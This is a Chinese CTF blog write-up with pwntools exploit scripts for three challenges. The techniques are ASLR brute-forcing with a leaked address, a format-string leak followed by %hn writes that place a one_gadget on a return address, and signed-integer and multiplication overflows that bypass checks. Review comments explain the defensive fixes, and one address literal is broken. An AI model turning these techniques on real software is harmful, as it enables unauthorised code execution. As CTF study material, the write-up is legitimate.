
本文编写于 377 天前,最后修改于 119 天前,其中某些信息可能已经过时。

unctf

sosoeasy

from pwn import * 
import binascii 
context.log_level = 'debug' 
# NOTE(review): loaded here but never referenced in this script.
elf = ELF('./x86_libc.so.6') 
# Length of the filler placed before the 4-byte value appended below.
offset = 12 
i = 0 
# Retry loop: every iteration restarts the target, reads the value the
# program prints after "the ", sends one payload and keeps the session only
# if it is still alive after the menu choice. Python 2 syntax ("print i");
# this will not parse under Python 3.
while True:     
    i += 1         
    print i         
    sh = process('./pwn')     
    #sh = remote('101.71.29.5',10000)         
    sh.recvuntil('the ')     
    #sh.recvuntil('\x32')     
    # Five characters printed by the program, parsed as decimal and shifted
    # into the upper 16 bits. Presumably the program discloses part of an
    # address here — cannot confirm without the binary. Defensively, the
    # lesson is that any printed address-derived value defeats ASLR/PIE.
    base = int(sh.recv(5)) << 16    
    print hex(base)     
    sh.recvuntil('name?\n')         
    payload = 'a'*offset     
    #addr = base + random.sample(list1,1)[0]         
    # NOTE(review): "0x 59d6" contains a space inside the literal and is a
    # SyntaxError as written — looks like a paste artifact. A fixed-size
    # filler followed by a packed pointer suggests the "name" read is
    # unbounded; a length-checked read and a stack canary are the fixes.
    payload += p32(base+0x 59d6)     
    sh.send(payload)     
    sh.recvuntil('(1.hello|2.byebye):\n')     
    sh.send('0')     
    # A recv timeout is treated as "this attempt failed": close and retry.
    # The bound exception `e` is never used.
    try:                 
        sh.recv(timeout = 1)              
    except Exception as e:         
        sh.close()         
        continue     
    else:         
        sleep(0.1)         
        sh.interactive()

360ctf pwn1

程序分析

    Arch:     i386-32-little
    RELRO:    Full RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled

难点在于:

  1. 限制了输入次数为3次,每次长度为16字节
  2. 格式化字符串在.bss段上

攻击思路主要是先突破输入次数限制,再寻找合适的跳板覆盖返回地址为one_gadget

漏洞利用

from pwn import *
context.log_level   = 'debug'
p = process('./fmt')

# libc offsets the writeup treats as one_gadget candidates (see the analysis
# above); only gadgets[1] is used further down. These are specific to the
# libc build shipped with the challenge and differ for any other build.
gadgets =[0x3a80c,0x3a80e,0x3a812,0x3a819,0x5f065,0x5f066]

def HL(value):
    """Split *value* into its 16-bit halves.

    Returns ``[low, high]`` where ``low`` is ``value & 0xffff`` and ``high``
    is ``value >> 16``. The high half is not masked, so any bits above bit
    31 remain in ``high``.
    """
    low_half = value & 0xffff
    high_half = value >> 16
    return [low_half, high_half]

def input(payload):
    """Pick menu option 1 on the global process ``p`` and send *payload*.

    Waits for the "2. Exit" menu line, answers '1', waits for the
    "something" prompt, then sends *payload* followed by a newline.

    NOTE(review): the name shadows the ``input`` builtin for the rest of
    the module; kept as-is because the calls below depend on it.
    """
    p.recvuntil("2. Exit")
    p.send('1')
    p.recvuntil("something")
    p.sendline(payload)

def exit():
    """Pick menu option 2 ("Exit") on the global process ``p``.

    NOTE(review): shadows the ``exit`` builtin within this module.
    """
    p.recvuntil("2. Exit")
    p.send('2')

## leak address
# A single format-string read prints three stack slots (positional args 5,
# 12 and 15) as pointers. The writeup notes the format buffer lives in .bss,
# so the later %hn writes go through pointers that already sit on the stack
# rather than through the payload itself. Defensive fix for this bug class:
# never pass user data as the format argument (printf("%s", buf)) and build
# with -Wformat-security. Full RELRO (checksec above) already rules out a
# GOT overwrite, which is why a return address is targeted instead.
input("%5$p%12$p%15$p")
p.recvline()
leaked = p.recvline()
# Each %p yields "0x" + 8 hex digits on i386; the slices pick the three
# values apart. The subtracted constants are offsets for this particular
# binary/libc build and are meaningless elsewhere.
bin_base = int(leaked[2:10], 16) - 0x1fb8
stack_addr = int(leaked[12:20], 16)
var_addr = stack_addr - 0x2C + 0x3
target_addr = stack_addr - 0x4
libc_base = int(leaked[22:30],16) - 247 - 0x18540
shell_addr = libc_base + gadgets[1]
bp = bin_base + 0x81c   # only used by the commented-out gdb.attach
#gdb.attach(p,'b *' + str(hex(bp)))
log.info("binary_base address is %x" % bin_base)
log.info("stack address is %x" % stack_addr)
log.info("libc_base address is %x" % libc_base)
log.info("var address is %x" % var_addr)
log.info("target address is %x" % target_addr)

## Modify var i values
# "%<N>c%21$hn" prints N characters and stores N (the low half of var_addr)
# through arg 21; "%255d%57$hhn" then stores the byte 255 through arg 57.
# Presumably arg 57 is the slot arg 21 points at — cannot confirm from
# here. The writeup describes this step as lifting the three-input limit.
lis = HL(var_addr)
input("%" + str(lis[0])  + "c%21$hn")
input("%255d%57$hhn")

## Write one_gadget at ret_addr through the target_addr
# Point args 21 and 22 at the two 16-bit halves of target_addr ...
lis = HL(target_addr)
input("%" + str(lis[0])  + "c%21$hn")
lis = HL(target_addr+2)
input("%" + str(lis[0])  + "d%22$hn")

# ... then write shell_addr through args 57/59, one half at a time
# (presumably the slots args 21/22 were just pointed at — verify).
lis = HL(shell_addr)
input("%" + str(lis[0])  + "c%57$hn")
input("%" + str(lis[1])  + "c%59$hn")

exit()
p.interactive()

360ctf pwn2

程序分析

绕过两个判断就能拿到flag
(1)判断1:x1和y1都是有符号整数,令y1为负就可以绕过判断
考察点:整数范围
(2)判断2:int类型大小为4个字节,通过eax传递,只要两个数相乘等于0x100000168,超过其表示范围就可以绕过

漏洞利用

exp:

from pwn import *
#context.log_level = 'debug'

p = process("./pwn1")
#p = remote("localhost",12345)

# NOTE(review): the process is spawned at import time above, so the
# __main__ guard only protects the interaction, not the spawn.
if __name__=='__main__':
    p.recvuntil("x:")
    p.sendline(str(359))
    p.recvuntil("y:")
    # Check 1 (per the writeup): x and y are signed; 2**32-1 presumably
    # reads back as -1 in a 32-bit signed int. A robust parser would
    # range-check the parsed value and reject out-of-range input instead
    # of letting it wrap.
    p.sendline(str(2**32-1))
    p.recvuntil("Please input x and y:")
    #gdb.attach(p)
    # Check 2 (per the writeup): the product is compared as a 4-byte int,
    # so operands whose product exceeds 32 bits pass the check. The fix is
    # checked multiplication (or computing in a wider type with an explicit
    # range test). NOTE(review): Python 2 integer division here; under
    # Python 3 '/' produces a float and str() would send a ".0" suffix.
    p.sendline(str(0x0000000100000008)+" "+str(0x0000000100000168/8))
    p.interactive()